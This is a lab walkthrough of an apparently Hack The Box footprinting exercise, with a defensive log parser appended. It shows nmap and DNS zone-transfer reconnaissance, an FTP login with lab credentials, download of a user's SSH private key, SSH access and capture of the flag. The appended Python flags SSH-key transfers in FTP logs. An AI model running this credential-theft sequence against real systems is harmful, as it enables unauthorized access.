Footprinting Lab - Easy
┌─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:12 +04
Nmap scan report for 10.129.122.64
Host is up (0.30s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds
┌─[✗]─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64 -sV -sC -p21,22,53,2121
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:16 +04
Nmap scan report for 10.129.122.64
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.122.64]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.122.64]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds
┌─[root@parrot]─[/home/z3tssu]
└──╼ #dig axfr inlanefreight.htb @10.129.75.47
; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.75.47
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
app.inlanefreight.htb. 604800 IN A 10.129.18.15
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 10.129.34.136
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 319 msec
;; SERVER: 10.129.75.47#53(10.129.75.47) (TCP)
;; WHEN: Sat Mar 08 17:09:16 +04 2025
;; XFR size: 10 records (messages 1, bytes 540)
dnsenum --dnsserver STMIP --enum -p 0 -s 0 -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt internal.inlanefreight.htb
----- internal.inlanefreight.htb -----
Host's addresses:
__________________
Name Servers:
______________
ns.inlanefreight.htb. 604800 IN A 10.129.34.136
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
unresolvable name: ns.inlanefreight.htb at /usr/bin/dnsenum line 900 thread 2.
Trying Zone Transfer for internal.inlanefreight.htb on ns.inlanefreight.htb ...
AXFR record query failed: no nameservers
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:
________________________________________________________________________________________________
ftp.internal.inlanefreight.htb. 604800 IN A 127.0.0.1
ns.internal.inlanefreight.htb. 604800 IN A 10.129.34.136
vpn.internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200
wsus.internal.inlanefreight.htb. 604800 IN A 10.129.18.2
ws1.internal.inlanefreight.htb. 604800 IN A 10.129.1.34
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #cat /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.75.47 internal.inlanefreight.htb
10.129.75.47 ftp.internal.inlanefreight.htb
10.129.42.249 gettingstarted.htb
# Others
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #nmap -T4 ftp.internal.inlanefreight.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 17:31 +04
Nmap scan report for ftp.internal.inlanefreight.htb (10.129.75.47)
Host is up (0.33s latency).
rDNS record for 10.129.75.47: internal.inlanefreight.htb
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
At this point we need to recall the details written in the assessment's lab scenario, specifically the credentials ceil:qwer1234.
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ftp ftp.internal.inlanefreight.htb 2121
Connected to ftp.internal.inlanefreight.htb.
220 ProFTPD Server (Ceil's FTP) [10.129.75.47]
Name (ftp.internal.inlanefreight.htb:z3tssu): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||4766|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -la
229 Entering Extended Passive Mode (|||48089|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||63095|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*************************************************| 3381 16.96 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (8.33 KiB/s)
After you have downloaded id_rsa from the server, it is stored on the attacker machine. Restrict its permissions so the SSH client accepts it:
chmod 600 id_rsa
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ssh ceil@10.129.75.47 -i id_rsa
The authenticity of host '10.129.75.47 (10.129.75.47)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.47' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 08 Mar 2025 01:42:12 PM UTC
System load: 0.0 Processes: 161
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.75.47
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$
ceil@NIXEASY:~$ ls -la
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
ceil@NIXEASY:~$ pwd
/home/ceil
ceil@NIXEASY:~$ cd /home
ceil@NIXEASY:/home$ ls
ceil cry0l1t3 flag
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls
flag.txt
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
ceil@NIXEASY:/home/flag$
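From the defender's side, the FTP retrieval of .ssh/id_rsa shown in the session above leaves a record in the server's transfer log. The following is an added example, not part of the original walkthrough: it parses xferlog-format records (the format ProFTPD's TransferLog directive writes) and flags transfers that touch SSH key material. The log lines, addresses and the /srv/backup path are constructed, and the check also covers uploads, which the walkthrough does not show.

```python
import re

# Constructed sample in xferlog format; hosts, times and paths are made up.
SAMPLE_XFERLOG = """\
Sat Mar  8 13:40:11 2025 1 192.0.2.10 3381 /home/ceil/.ssh/id_rsa b _ o r ceil ftp 0 * c
Sat Mar  8 13:41:02 2025 1 192.0.2.10 807 /home/ceil/.profile a _ o r ceil ftp 0 * c
Sat Mar  8 13:42:30 2025 2 192.0.2.11 738 /home/ceil/.ssh/authorized_keys b _ i r ceil ftp 0 * c
Sat Mar  8 13:43:00 2025 1 192.0.2.10 1675 /srv/backup/id_ed25519 b _ o r ceil ftp 0 * i
"""

# Paths that indicate SSH key material: anything under .ssh/, default private
# key file names, and common key container extensions.
SENSITIVE = re.compile(r"(^|/)\.ssh/|(^|/)id_(rsa|dsa|ecdsa|ed25519)$|\.(pem|ppk)$")
DIRECTION = {"o": "download", "i": "upload", "d": "delete"}

def parse_xferlog_line(line):
    """Return a dict for one xferlog record, or None if the line is malformed."""
    parts = line.split()
    if len(parts) < 18 or not parts[7].isdigit():
        return None
    # 8 fixed fields lead the record and 9 trail it; whatever sits between
    # them is the file name, so a name containing spaces still parses.
    head, tail = parts[:8], parts[-9:]
    return {
        "time": " ".join(head[:5]),
        "host": head[6],
        "size": int(head[7]),
        "path": " ".join(parts[8:-9]),
        "direction": DIRECTION.get(tail[2], tail[2]),
        "user": tail[4],
        "complete": tail[8] == "c",
    }

def find_key_transfers(log_text):
    """Return the parsed records whose path looks like SSH key material."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec and SENSITIVE.search(rec["path"]):
            findings.append(rec)
    return findings

if __name__ == "__main__":
    for f in find_key_transfers(SAMPLE_XFERLOG):
        state = "complete" if f["complete"] else "incomplete"
        print(f["time"], f["host"], f["user"], f["direction"], f["path"], f"({state})")
```

An alert on any such record is a cue to rotate the affected key pair and remove its public half from authorized_keys.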